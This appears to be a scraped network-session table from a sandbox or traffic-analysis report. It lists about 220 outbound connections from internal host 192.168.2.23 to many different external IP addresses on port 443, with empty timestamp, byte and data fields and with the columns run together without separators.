                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14598192.168.2.2350398221.146.13.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14599192.168.2.2334926197.249.37.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14600192.168.2.234767675.198.71.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14601192.168.2.2356636219.120.253.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14602192.168.2.235059060.64.170.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14603192.168.2.2342602208.125.204.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14604192.168.2.233821073.181.123.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14605192.168.2.2337792125.118.222.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14606192.168.2.235395481.6.128.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14607192.168.2.2332970111.131.104.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14608192.168.2.2333654154.156.4.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14609192.168.2.233943613.114.53.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14610192.168.2.2357590124.58.18.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14611192.168.2.235358078.161.247.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14612192.168.2.234140677.221.95.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14613192.168.2.234686032.5.249.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14614192.168.2.2359606129.58.64.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14615192.168.2.23427848.134.52.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14616192.168.2.235492823.220.16.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14617192.168.2.2348608103.44.51.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14618192.168.2.2348052124.200.229.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14619192.168.2.233896023.13.72.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14620192.168.2.234820469.243.224.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14621192.168.2.2353968206.83.60.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14622192.168.2.235994291.142.204.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14623192.168.2.23530088.18.35.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14624192.168.2.233834420.114.156.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14625192.168.2.233861612.2.11.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14626192.168.2.23466041.5.196.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14627192.168.2.235605232.149.51.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14628192.168.2.235214865.81.232.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14629192.168.2.234648448.186.171.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14630192.168.2.2338810170.143.170.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14631192.168.2.235687277.44.64.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14632192.168.2.235096219.98.205.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14633192.168.2.234921884.169.111.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14634192.168.2.2339880197.114.190.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14635192.168.2.2347074203.255.236.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14636192.168.2.234103678.72.47.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14637192.168.2.2353040106.132.227.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14638192.168.2.2360750198.192.164.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14639192.168.2.2359486102.63.56.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14640192.168.2.2345766114.38.65.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14641192.168.2.2341692141.10.107.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14642192.168.2.233595065.167.182.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14643192.168.2.2340520178.151.253.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14644192.168.2.235250661.232.250.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14645192.168.2.234306849.80.165.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14646192.168.2.2337628134.22.16.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14647192.168.2.2349290195.121.41.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14648192.168.2.2349206109.130.233.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14649192.168.2.2333036162.163.220.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14650192.168.2.2346040135.133.205.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14651192.168.2.233488699.241.40.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14652192.168.2.2355474206.169.138.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14653192.168.2.2346652128.98.96.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14654192.168.2.234863640.111.246.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14655192.168.2.235007647.112.65.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14656192.168.2.235639635.55.169.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14657192.168.2.234717265.249.36.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14658192.168.2.235959825.121.248.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14659192.168.2.235704676.62.29.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14660192.168.2.233737083.21.94.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14661192.168.2.234035048.61.177.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14662192.168.2.2340816219.201.254.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14663192.168.2.2336926145.38.136.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14664192.168.2.2353000194.171.174.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14665192.168.2.2342156152.116.23.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14666192.168.2.235494095.195.165.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14667192.168.2.233926279.249.183.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14668192.168.2.2343046142.207.144.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14669192.168.2.234684245.164.203.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14670192.168.2.233379647.100.57.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14671192.168.2.233585896.57.144.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14672192.168.2.234160661.95.130.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14673192.168.2.235705452.105.84.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14674192.168.2.2336200211.32.152.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14675192.168.2.2343942177.253.11.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14676192.168.2.2357108222.106.129.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14677192.168.2.2352714158.149.102.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14678192.168.2.233429448.102.244.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14679192.168.2.2360450126.254.103.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14680192.168.2.2350074170.109.13.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14681192.168.2.234172062.205.65.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14682192.168.2.2357906222.223.143.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14683192.168.2.2349440114.230.58.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14684192.168.2.2333660178.129.95.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14685192.168.2.2337708171.253.141.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14686192.168.2.235016641.99.155.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14687192.168.2.2346490162.50.63.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14688192.168.2.2346452194.115.173.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14689192.168.2.2341368104.80.61.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14690192.168.2.233977427.246.78.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14691192.168.2.234029489.164.242.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14692192.168.2.233554227.19.11.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14693192.168.2.233659446.172.85.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14694192.168.2.233573418.124.166.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14695192.168.2.2349460134.243.106.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14696192.168.2.234653865.236.116.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14697192.168.2.2341358162.183.198.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14698192.168.2.234827437.169.190.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14699192.168.2.234601831.184.154.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14700192.168.2.2349902193.198.73.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14701192.168.2.235706451.116.20.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14702192.168.2.2336318206.5.215.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14703192.168.2.2337860131.73.111.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14704192.168.2.2334112130.38.141.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14705192.168.2.234220698.233.28.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14706192.168.2.2338092134.207.78.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14707192.168.2.2337688139.239.176.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14708192.168.2.233363892.133.205.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14709192.168.2.234512827.237.206.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14710192.168.2.2358224156.175.18.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14711192.168.2.233501635.127.179.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14712192.168.2.2342236146.211.252.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14713192.168.2.233343264.26.64.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14714192.168.2.2338940201.144.3.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14715192.168.2.2334610188.18.213.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14716192.168.2.2360786161.210.6.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14717192.168.2.235400846.38.32.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14718192.168.2.235649462.189.173.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14719192.168.2.2351106152.228.77.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14720192.168.2.2345920218.77.179.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14721192.168.2.2338894174.2.204.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14722192.168.2.233394097.3.245.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14723192.168.2.2350868104.138.169.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14724192.168.2.233596814.220.54.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14725192.168.2.23399922.94.120.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14726192.168.2.2350604165.87.240.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14727192.168.2.2342702196.69.42.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14728192.168.2.233467643.151.30.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14729192.168.2.2351006139.93.193.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14730192.168.2.23609042.44.202.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14731192.168.2.23336628.202.225.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14732192.168.2.2346060121.61.51.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14733192.168.2.233975088.234.229.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14734192.168.2.2351568120.46.126.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14735192.168.2.234884231.10.63.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14736192.168.2.2342796213.246.185.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14737192.168.2.2332872139.1.231.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14738192.168.2.2353814218.249.129.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14739192.168.2.235067292.29.84.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14740192.168.2.2350876153.17.23.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14741192.168.2.235089457.48.220.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14742192.168.2.2359776177.125.36.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14743192.168.2.2345520157.94.180.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14744192.168.2.2339886166.130.110.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14745192.168.2.2349092177.52.180.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14746192.168.2.2339146128.140.214.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14747192.168.2.234382052.41.225.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14748192.168.2.2354572186.212.59.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14749192.168.2.233717450.100.170.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14750192.168.2.2344544113.146.46.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14751192.168.2.2349942162.35.60.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14752192.168.2.2350298191.255.72.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14753192.168.2.2347266149.75.114.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14754192.168.2.234748282.210.173.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14755192.168.2.2333940218.206.184.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14756192.168.2.23457741.144.159.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14757192.168.2.2347240141.151.75.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14758192.168.2.234696094.251.141.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14759192.168.2.234596268.84.53.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14760192.168.2.2338428188.179.110.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14761192.168.2.2335998170.51.80.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14762192.168.2.2337824190.130.92.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14763192.168.2.2358254124.53.185.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14764192.168.2.23447682.197.9.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14765192.168.2.235141072.0.13.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14766192.168.2.2354388112.11.123.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14767192.168.2.2341278134.252.85.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14768192.168.2.2337992181.94.231.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14769192.168.2.234503431.178.193.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14770192.168.2.2350890107.189.131.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14771192.168.2.2348144113.123.128.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14772192.168.2.2357824133.215.247.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14773192.168.2.2350932126.117.167.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14774192.168.2.234361272.73.123.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14775192.168.2.2356680183.173.94.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14776192.168.2.2340724185.14.194.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14777192.168.2.233548662.96.193.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14778192.168.2.2341982151.185.248.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14779192.168.2.2334180204.97.198.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14780192.168.2.2345176129.56.18.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14781192.168.2.2336454207.147.145.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14782192.168.2.2333686147.126.172.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14783192.168.2.2335876150.203.111.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14784192.168.2.2339288132.107.61.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14785192.168.2.233703685.8.47.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14786192.168.2.236074062.154.220.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14787192.168.2.2356476167.131.219.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14788192.168.2.2335928165.227.93.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14789192.168.2.235694854.68.144.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14790192.168.2.2349266222.51.120.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14791192.168.2.2360976154.3.29.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14792192.168.2.2336994184.64.72.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14793192.168.2.2360474147.235.120.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14794192.168.2.2350784113.136.48.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14795192.168.2.234876693.149.92.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14796192.168.2.2350268203.149.128.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14797192.168.2.233673280.65.155.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14798192.168.2.234338634.244.177.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14799192.168.2.2356146129.198.198.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14800192.168.2.234804295.173.54.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14801192.168.2.2338290208.225.21.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14802192.168.2.2348320179.171.16.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14803192.168.2.2347916172.138.251.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14804192.168.2.236077278.72.124.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14805192.168.2.23411328.43.123.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14806192.168.2.235119834.7.78.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14807192.168.2.2358456194.0.145.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14808192.168.2.2359246191.155.220.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14809192.168.2.234504261.17.186.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14810192.168.2.234938017.181.22.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14811192.168.2.233567446.26.208.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14812192.168.2.2352534217.110.177.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14813192.168.2.2337660210.181.30.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14814192.168.2.2350738169.210.18.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14815192.168.2.2346080170.22.66.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14816192.168.2.2345408164.244.149.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14817192.168.2.2333572182.156.10.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14818192.168.2.233457061.113.117.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14819192.168.2.235239239.107.205.74443
                                                TimestampBytes transferredDirectionData


